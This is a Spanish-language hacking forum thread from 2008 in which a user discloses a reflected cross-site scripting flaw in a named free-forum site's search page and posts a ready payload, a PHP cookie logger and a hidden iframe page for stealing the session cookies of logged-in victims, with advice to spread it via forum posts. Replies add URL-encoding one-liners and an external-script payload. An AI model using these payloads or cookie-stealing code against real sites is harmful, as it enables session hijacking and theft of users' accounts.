[XSS] foroswebgratis

Iniciado por 6666, 28 Enero 2008, 03:52 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1 2
Acciones del Usuario

6666

28 Enero 2008, 03:52 AM Ultima modificación: 28 Enero 2008, 05:26 AM por z1x2c3z1x2c3|
en realidad el xss esta de hace bastante tiempo..siempre sta web tuvo multiples vulnerabilidades..la primero vez que encontre uno fue solo de accidente en el panel de administracion del foro ejempl: yo era admin-Foro.php?id_foro=1 cambia por 2 y ya estaba en la cuenta del foro numero 2..luego lo repararon..al poco tiempo habia encontrado otro..donde se podian borrar foros asi de la nada con solo dar click en un enlace..tmb lo arreglaron..y bue ahora este xss.

el error esta en el buscador de la web  "home-buscador-run.php"

link:

Código [Seleccionar]
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />


y aqui la tabla para encodearla:
son los de la columna code..

http://ttssh2.sourceforge.jp/manual/en/macro/appendixes/ascii.html

la web encodeada quedaria asi: http://www.misitio.com/s.php?c=

grabador de cookies(s.php):

Código [Seleccionar]
<?php
 $cookie $_GET['c'];
 $ip getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl fopen('log.txt''a');
 fwrite($fl"\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>


index.htm

Código [Seleccionar]
<iframe width="1" height="1" src="http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />" scrolling="no" name="hola" align="middle" border="0" frameborder="0">

y listo solo le mandas la web donde tengo el codigo de index.htm a la victima y robara su cookie.(tiene q estar logueada).lo ideal es ponerla como post en algun foro.

saludos!

publicado en : http://kasp.gratishost.com/xss.htm  xD

sirdarckcat

#1
28 Enero 2008, 04:57 AM
Para codificar puedes usar..
javascript:x=[];for each(s in "tu-pagina-web")x.push(s.charCodeAt(0));x;

Lee la politica de disclosure.. debes colocar un enlace a una web tuya donde reportes esta vulnerabilidad.

Saludos!!

berz3k

#2
28 Enero 2008, 15:16 PM
g00d, el "string line" que buscaba, me gusto hacerlo directo r0x.

thanks sirdarckgatito

-berz3k.

sirdarckcat

#3
29 Enero 2008, 03:55 AM
Ahmm no funciona en IExplorer.. porque uso algo de javascript 1.7

Esto funciona en IExplorer y Opera y Firefox:
javascript:"tu-pagina-web".replace(/./g,function(x){return x.charCodeAt(0)+","});

6666

#4
29 Enero 2008, 22:29 PM
woow! la verdad que me sirvio ese aporte.

Cicklow

#6
18 Marzo 2008, 23:22 PM
www.cicklow.com . Solo Soy Un Ciego que Ve El Sonido Del Silencio

6666

#7
1 Abril 2008, 08:09 AM Ultima modificación: 1 Abril 2008, 08:13 AM por z1x2c3z1x2c3|

Achernar

#8
8 Abril 2008, 00:30 AM
Recien estoy aprendiendo estoy y leyendo algunos papers, tengo unas dudas..

1) porque esto SI se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>

y esto NO se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>

:huh:

2) cuando se roban cookies... son cookies de la pagina vulnerable o no?

Gracias.

Asfasfos

#9
8 Abril 2008, 18:00 PM
Citar1) porque esto SI se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>

y esto NO se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>

Seguramente por las comillas dobles

Citar2) cuando se roban cookies... son cookies de la pagina vulnerable o no?

Depende de si el usuario que ejecuta el XSS está logueado o no, si lo está entonces seguramente si que robes cookies válidas
Imprimir
Ir Arriba Páginas1 2
Acciones del Usuario